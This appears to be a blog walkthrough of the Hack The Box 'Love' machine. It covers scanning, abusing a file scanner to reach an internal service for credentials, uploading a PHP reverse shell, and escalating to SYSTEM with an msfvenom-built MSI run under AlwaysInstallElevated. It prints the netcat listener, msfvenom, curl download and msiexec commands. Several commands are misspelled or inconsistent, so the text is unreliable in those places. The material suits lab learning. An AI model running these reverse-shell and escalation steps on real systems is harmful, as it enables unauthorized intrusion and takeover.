Love hack the box walkthrough

LOVE WALKTHROUGH

WELCOME TO TAMILCODE 

  HERE IS TRICKS AND TECHNOLOGY 

ON THE WEBSITE WE GOING TO SEE THE WALKTHROUGH FOR THE LOVE MACHINE SO LET GET START...

First, turn on your VPN which has been provided by the hack the box using the OpenVPN tool which is installed previously in the Linux distribution

STEP :1 openvpn filename.ovpn

now the VPN has been started... 

ON THE WEBSITE WE GOING TO SEE THE WALKTHROUGH FOR THE LOVE MACHINE SO LET GET START.

so now take the Nmap scan :

STEP 2: nmap -sC -sV 10.10.10.239

below you can able to see the report of Nmap 

so next open the anther terminal and run the gobsuter tool 

cmd is below 

STEP 3: gobsuter dir -u http://10.10.10.239/ -w /usr/share/worldlists/dirb/common.txt

picture and report is shown below (gobuster report)

in the Nmap report you able to see the port 80 has two websites one is Apache and secure file scanner..   

FOR UNDERSTANDING PURPOSE :

here the apache is voting system: www.love.htb 

and next secure file scanner : staging.love.htb 

show in the below picture 

Let we going change the host's file in Linux system located in /etc/hosts .. picture is below 

enter the below statement (copy and paste )

10.10.10.239  staging.love.htb 

Now open the browser and load the staging.love.htb 

you will be able to access the secure file scanner website 

click the demo tab shown in the below picture 

now you see the file scan search bar I used all ports in the file scanning. At last I able see the one usual port which is 5000 so enter the below command...

STEP 4: http://127.0.0.1:5000   

boommmm!!!! hurrah !!!!! yessss !!

you get the username and password which is showed below

 

so next we going to access the admin page which found using the gobuster tool 

open the admin and enter the username and password 

hurrah !! now get login in to the website 

now click the profile in the right concern  (shown below picture) Click the update button there you are able to see the photo uploading section ( NOTE THE VULNERABILITY: in the section there is no extension like jpeg, png, etc.... )

so, In this case, we upload the shell because it is file inclusion vulnerability.. so the shell is below you copy and pastes in your in notepad please give the extension of PHP because it is PHP shell 

eg: love.php shell name 

DOWNLOAD SHELL  BY CLICKING BELOW 

NOTE : 

BY SEE THE BELOW PICTURE ENTER YOUR tun0 IP address

 

Before that start the netcat 

STEP 5: nc -lvp 9000 

USE ONLY THE ABOVE PORT OTHERWISE, IT WILL NOT WORK

STEP 6: upload shell and give the current password used for login 

now you will get the shell 

so next enter whoami you get love/phobe so in this case your normal user you will be able to take the user flag which is user.txt ok let come 

STEP 7: cd users 

STEP 8: cd phobe 

STEP 9: dir 

STEP 10: cd Desktop

 

STEP 11: dir 

hurrah !!!

you will get the user flag which user.txt

so type the below command 

STEP 12: type user.txt

now you get the user flag so next, we going to get the root flag which is root.txt

so after a long time, I have found that the machine has allowed the MSI file which is always installed elevated policy.

I would allow you for local privilege escalation which was found using google search 

what is always install elevated policy? 

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users for this purpose, the AlwaysInstallElevated policy feature is used to install an MSI package file with elevated (system) privileges. This policy is enabled in the Local Group Policy editor; directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This method can make a machine vulnerable posing a high-security risk because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.

Caution Note: 

This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting. Hence this should be used for lab purposes only (and not in a Production environment) (source)

so now we going to create the MSI file using Metasploit 

STEP 13: msfvenom -p windows/x64/reverse_tcp_shell LHOST=10.10.10.60 LPORT=9090 -f msi -o love.msi 

give your IP address otherwise, I will not work 

before that start the reverse shell using netcat 

STEP 14: rlwarp nc -lvp 9090

if the rlwarp is not worked download tool by giving this command

 sudo apt-get install rlwarp

so next start the python server in the payload install folder 

STEP 15: sudo -m python3 http.server 80 

you should only start in 80 port and put sudo for root permission

NEXT, GO TO HTB MACHINE WHICH LOVE MACHINE 

USE THE TOOL WHICH IS CURL 

STEP 16: curl http://10.10.10.60/love.msi -o love.msi 

instance of my IP gives your tun0 IP and file (love.msi)

NEXT, WE GOING SETUP THE FILE 

STEP 17: msiexec /quiet /qn /i setup.msi

STEP 18: msiexec /quiet /qn /i reverse.msi

use above two steps first step 17 is used to setup the msi file and step 18 to connect the msi file to netcat 

after executing step 18 you want to see netcat which I have set in step: 14 

boommmm!!

now you will get the shell in netcat shown in the above picture 

so now you the whoami command it will show the nt authority/system which maximum privilege in system . so now your administrator you will able to access the root flag now go back using cd. 

STEP 19: cd administrator

STEP 20: cd Desktop 

STEP 21: dir   

boommmm !!!! haaaa !!

you will able to see the root flag which is root.txt

STEP 22: type root.txt 

so now you will get the user flag and root flag for the machine so thank you for reading the articles please share this and if have any doubt please comment on us and if want to download the article click below to buy me a coffee and please support us.....

if want to download the poster click below the download button 

or download use this below button